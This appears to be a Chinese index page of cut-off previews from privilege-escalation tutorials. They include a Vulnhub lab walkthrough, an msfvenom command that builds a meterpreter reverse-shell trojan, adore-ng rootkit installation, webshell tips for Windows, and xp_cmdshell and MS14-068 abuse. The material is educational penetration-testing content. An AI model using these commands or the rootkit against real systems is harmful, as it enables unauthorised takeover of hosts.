Vulnhub-Five86-1 实验环境 kali攻击机ip:192.168.56.116 Five86-1靶机ip:192.168.56.121 知识点及工具 nmap扫描 john爆破 OpenNetAdmin RCE 开始渗透 首先第一步对目标靶机网络 nmap -A –p- 192.168.56.121 扫描发现一个80web端口和一个22ssh端口和10000webmin端口. Web浏览 http://192.168.56.121,页面啥都没有空白一片 使用dirb工具对目录进行扫…
利用/etc/passwd提权 个人认为,这种提权方式在现实场景中难以实现,条件太过苛刻,但是建立Linux下的隐藏账户是个不错的选择,灵感来自:https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/ 利用条件 拥有一个普通用户的权限 普通用户有/etc/passwd的写权限 利用原理 目前不是特别清楚,只知道Linux下的/etc/passwd用于标识账户信息,/etc/shadow用于标…
官网:https://github.com/trimpsyw/adore-ng 安装: [root@xuegod63 ~]# unzipadore-ng-master.zip [root@xuegod63 ~]# cdadore-ng-master [root@xuegod63 adore-ng-master]#rpm  -ivh/mnt/Packages/kernel-devel-2.6.32-220.el6.x86_64.rpm yum install gcc* [root@xuegod63…
[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com…
  0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口…
i春秋作家:yangyangwithgnu 1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路,也是后渗透阶段成功的关键.windows 提权,常用手法包括搜寻本地明文密码.DB 命令执行提权.内核 exp 提权.dll 劫持提权.路径未带引号的服务提权.滥用高权 token 提权.三方软件提权,每种手法有各自的使用门槛及适用场景,通常需要多种措施并举,才能拿下目标. 其中,若能在目标上搜寻…
本文参考自冷逸大佬的博客,源地址在这里:https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/ windows提权 windows下的权限: - user - administrator - system 一些常用命令: systeminfo | findstr OS #获取系统版本信息 hostname #获取主机名称 whomai /priv #显示当前用户的安全特权 quser or query use…
本文原文地址:https://www.cnblogs.com/wintrysec/p/10875232.html 一.利用xp_cmdshell提权 xp_cmdshell默认是关闭的,可以通过下面的命令打开 ;;RECONFIGURE; 如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复 exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSS…
sudo(superuser or another do)让普通用户可以以超级管理员或其他人的身份执行命令. sudo基本流程如下: 1.管理员需要先授权(修改/etc/sudoers文件) 2.普通用户以sudo的形式执行命令 3.可以通过sudo -l 查看授权情况 修改/etc/sudoers的方法如下: 1.visudo(带语法检查,默认没有颜色提示) 2.vim /etc/sudoers(不带语法检查,默认有颜色提示) 授权格式: 用户或组 主机列表=(提权身份) [NOPASSWD]…
MS14-068域提权漏洞复现 一.漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限. 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二.漏洞原理 Kerberos认证原理:https://www.cnblogs.com/huamingao/p/7267423.html 服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器…